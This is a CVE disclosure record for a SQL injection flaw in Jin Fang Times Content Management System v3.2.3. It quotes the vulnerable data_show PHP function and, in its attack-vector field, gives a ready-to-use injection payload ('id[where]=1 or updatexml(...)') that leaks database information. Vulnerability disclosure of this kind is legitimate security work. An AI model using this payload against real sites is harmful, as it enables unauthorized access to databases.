CVE-2024-34310
[Suggested description] Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter.
[Vulnerability Type] SQL Injection
[Vendor of Product] https://www.bjjfsd.com/
[Affected Product Code Base] Jin Fang times content management system - 3.2.3
[Affected Component] public function data_show($id = 0) {
if (empty($id)) { $this->redirect('index'); }$info = M('News')->find($id);
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)
[Discoverer] yishan
[Reference] http://jin.com https://www.bjjfsd.com/
Use CVE-2024-34310.